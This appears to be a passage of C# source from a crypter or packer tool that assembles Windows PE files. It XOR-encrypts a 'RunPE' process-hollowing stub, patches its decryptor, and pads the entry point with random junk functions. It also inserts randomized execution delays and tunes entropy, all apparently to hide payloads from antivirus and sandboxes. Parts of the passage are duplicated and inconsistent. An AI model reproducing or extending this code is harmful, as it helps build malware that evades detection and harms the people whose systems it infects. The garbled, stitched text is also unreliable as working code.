"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n" +
"TLS_SECTION_ADDRESS EQU 0x{3}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"),
shTLS.VirtualAddress.ToString("X8"));
#else
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"));
#endif
File.WriteAllText(SectionHeadersInclude, Format);
PEFactory.CompileTextSection(PE);
PEFactory.CompileIDataSection(PE);
PEFactory.CompileRunPESection(PE);
PEFactory.CompileDataSection(PE);
#if TLS
PEFactory.CompileTLSSection(PE);
#endif
ReplaceSectionByName(".text", shText, PE);
ReplaceSectionByName(".idata", shIData, PE);
ReplaceSectionByName(".data", shData, PE);
#if TLS
ReplaceSectionByName(".bss", shTLS, PE);
#endif
}
public static void CompileRunPESection(NewPE PE)
{
CompileSection("runpe", PE);
}
public static void CalculateSectionHeaders(NewPE PE)
{
PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
PE_SECTION_HEADER shData = GetSectionByName(".data", PE);
#if TLS
PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif
uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;
#if TLS
uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif
/* COMPUTE TEXT */
shText.VirtualSize = sizeOfText;
shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
shText.PointerToRawData = 0;
/* COMPUTE IDATA */
shIData.VirtualSize = sizeOfIData;
shIData.VirtualAddress =
((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
shIData.PointerToRawData = 0;
/* COMPUTE DATA */
shData.VirtualSize = sizeOfData;
shData.VirtualAddress =
((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
shData.PointerToRawData = 0;
#if TLS
/* COMPUTE TLS */
shTLS.VirtualSize = sizeOfTLS;
shTLS.VirtualAddress =
((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
shTLS.PointerToRawData = 0;
#endif
string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");
if (File.Exists(SectionHeadersInclude))
{
File.Delete(SectionHeadersInclude);
}
#if TLS
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n" +
"TLS_SECTION_ADDRESS EQU 0x{3}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"),
shTLS.VirtualAddress.ToString("X8"));
#else
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"));
#endif
File.WriteAllText(SectionHeadersInclude, Format);
PEFactory.CompileTextSection(PE);
PEFactory.CompileIDataSection(PE);
PEFactory.CompileRunPESection(PE);
PEFactory.CompileDataSection(PE);
#if TLS
PEFactory.CompileTLSSection(PE);
#endif
ReplaceSectionByName(".text", shText, PE);
ReplaceSectionByName(".idata", shIData, PE);
ReplaceSectionByName(".data", shData, PE);
#if TLS
ReplaceSectionByName(".bss", shTLS, PE);
#endif
}
public static void CompileMain(NewPE PE)
{
CompileSection("main", PE);
}
public static void ConstructTLSCallback(NewPE PE)
{
string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");
string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}";
if (File.Exists(TLSOffsetInclude))
File.Delete(TLSOffsetInclude);
Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8"));
File.AppendAllText(TLSOffsetInclude, Format);
PEFactory.CompileDataSection(PE);
//PEFactory.CompileTLSSection(PE);
}
private static void CompileSection(string SectionName, NewPE _PE)
{
string SectionSourcePath;
string SectionObjPath;
switch (SectionName)
{
case "text":
SectionSourcePath = _PE.PeDirectory.TextSectionPath;
SectionObjPath = _PE.PeDirectory.TextObjectPath;
break;
case "data":
SectionSourcePath = _PE.PeDirectory.DataSectionPath;
SectionObjPath = _PE.PeDirectory.DataObjectPath;
break;
case "idata":
SectionSourcePath = _PE.PeDirectory.IDataSectionPath;
SectionObjPath = _PE.PeDirectory.IDataObjectPath;
break;
case "bss":
SectionSourcePath = _PE.PeDirectory.TLSSectionPath;
SectionObjPath = _PE.PeDirectory.TLSObjectPath;
break;
case "runpe":
SectionSourcePath = _PE.PeDirectory.RunPESectionPath;
SectionObjPath = _PE.PeDirectory.RunPEObjectPath;
break;
case "main":
SectionSourcePath = _PE.PeDirectory.MainPath;
SectionObjPath = _PE.PeDirectory.SavePath;
break;
default:
SectionSourcePath = string.Empty;
SectionObjPath = string.Empty;
break;
}
if (File.Exists(SectionObjPath))
File.Delete(SectionObjPath);
ProcessStartInfo psi = new ProcessStartInfo();
psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
_PE.PeDirectory.RootDirectoryPath,
SectionSourcePath,
SectionObjPath);
psi.FileName = _PE.PeDirectory.CompilerPath;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process Proc = Process.Start(psi))
{
using (StreamReader sReader = Proc.StandardOutput)
{
string res = sReader.ReadToEnd();
}
}
}
public static void FixDecryptorLoop(NewPE PE)
{
string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");
string Format = "RUNPE_CODE_LENGTH EQU 0x{0}";
if (File.Exists(RunPELengthInclude))
File.Delete(RunPELengthInclude);
Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8"));
File.WriteAllText(RunPELengthInclude, Format);
PEFactory.CompileTextSection(PE);
}
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
{
string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();
byte[] trash_buffer;
if (!bLong)
{
int len_trash = Rand.Next(0x100, 0x120);
trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
}
else
{
int len_trash = Rand.Next(0x100, 0x120);
trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
}
for (int i = 0; i < olaf.Length; i++)
{
if (olaf[i].Contains("0x69"))
{
if (!bLong)
olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
else
olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
}
if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
{
if (!bLong)
{
olaf[i] = trash_buffer.ToASMBuffer();
}
else
{
olaf[i] = trash_buffer.ToASMBuffer();
}
}
}
File.Delete(PE.PeDirectory.DelayExecutionIncPath);
PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
}
public static void EncryptCodeAndAddKey(NewPE PE)
{
byte[] pKey = new byte[16];
Keys.PopulateBuffer(pKey);
byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
Xor.EncodeDecodeData(pRunPE, pKey);
if (File.Exists(PE.PeDirectory.RunPEObjectPath))
File.Delete(PE.PeDirectory.RunPEObjectPath);
PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);
string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
string Format = pKey.ToASMBuffer();
if (File.Exists(KeyInclude))
File.Delete(KeyInclude);
File.WriteAllText(KeyInclude, Format);
PEFactory.CompileDataSection(PE);
}
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();
int size_pre_ep = 0;
int size_ep = 0;
int size_post_ep = 0;
int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
// pre - ep
for (int i = 0; i < pre_ep_func_cnt; i++)
{
int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x200);
byte[] func_buffer;
if (Rand.NextDouble() >= 0.5)
func_buffer = new DataConstructor().GenData(func_len, func_len);
else
func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_pre_ep += func_buffer.Length;
}
}
JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;
// ep -
{
int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x140); // const
byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_ep += func_buffer.Length;
}
}
JCI.SIZE_EP_FUNCTION = size_ep;
//// post - ep
for (int i = 0; i < post_ep_func_cnt; i++)
{
int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x200);
byte[] func_buffer;
if (Rand.NextDouble() >= 0.5)
func_buffer = new DataConstructor().GenData(func_len, func_len);
else
func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_post_ep += func_buffer.Length;
}
}
JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;
// PAD ENTROPY
//int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment);
//byte[] zero_fill = new byte[0x1000];
//string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin");
//path_inc.WriteFile(zero_fill);
// JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2);
if (File.Exists(PE.PeDirectory.TextSectionPath))
File.Delete(PE.PeDirectory.TextSectionPath);
PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);
GC.Collect();
}
public static void CalculateNtHeader(NewPE PE, int nCountImportedModules)
{
PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) +
ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#if TLS
PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#endif
PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress;
PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // .data?
PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment);
PE.NtHeader.OptionalHeader.SizeOfImage = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment);
PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS);
// uint _magic = (uint)((nCountImportedModules + 1) * 20);
PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress;
PE.NtHeader.OptionalHeader.ImportDirectory.Size = GetSectionByName(".idata", PE).VirtualSize; // _magic;
/// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress + _magic;
/// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.Size = GetSectionByName(".idata", PE).VirtualSize - _magic;
PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#if TLS
PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#endif
}
